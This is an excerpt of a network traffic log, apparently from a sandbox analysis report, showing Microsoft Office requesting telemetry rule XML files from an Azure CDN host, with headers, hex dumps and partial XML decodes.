                                                                                                                                                                                        2024-11-24 01:14:06 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:06 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:06 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE055B528"
                                                                                                                                                                                        x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011406Z-178bfbc474bvjk8shC1NYC83ns000000052g00000000cd38
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:06 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        110192.168.2.54987913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:06 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:07 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:06 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE1223606"
                                                                                                                                                                                        x-ms-request-id: 6d656984-c01e-008d-0d1b-3d2eec000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011406Z-178bfbc474bvjk8shC1NYC83ns000000050g00000000hfp7
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:07 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        111192.168.2.54988113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:06 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:06 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                        x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011406Z-178bfbc474bw8bwphC1NYC38b4000000054g00000000628c
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:07 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        112192.168.2.54988013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:06 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:07 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE7262739"
                                                                                                                                                                                        x-ms-request-id: 9aa8fa60-a01e-001e-5131-3c49ef000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011407Z-15b8b599d88tr2flhC1TEB5gk400000003y0000000002x5m
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:07 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        113192.168.2.54988313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:07 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:07 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                        x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011407Z-174c587ffdfb74xqhC1TEBhabc00000003s0000000008tm3
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:07 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        114192.168.2.54988413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:08 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:09 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:08 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                        x-ms-request-id: a0a34a76-601e-0050-3b16-3d2c9c000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011408Z-178bfbc474bv7whqhC1NYC1fg400000005a0000000005ste
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:09 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        115192.168.2.54988613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:09 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:09 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:09 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                        x-ms-request-id: e88bdfa1-301e-003f-630e-3d266f000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011409Z-178bfbc474bbbqrhhC1NYCvw7400000005eg000000005wvn
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:09 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        116192.168.2.54988513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:09 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:09 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                        x-ms-request-id: af8656a8-801e-00a0-672a-3c2196000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011409Z-178bfbc474btrnf9hC1NYCb80g00000005eg000000006aan
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:09 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        117192.168.2.54988713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:09 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:09 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1427
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                        x-ms-request-id: ee240466-601e-00ab-24f2-3a66f4000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011409Z-178bfbc474bv7whqhC1NYC1fg4000000057g00000000c4ft
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:09 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        118192.168.2.54988813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:09 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:09 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1390
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE3002601"
                                                                                                                                                                                        x-ms-request-id: 74bdb417-d01e-00ad-341a-3de942000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011409Z-178bfbc474brk967hC1NYCfu60000000050g00000000e0xv
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
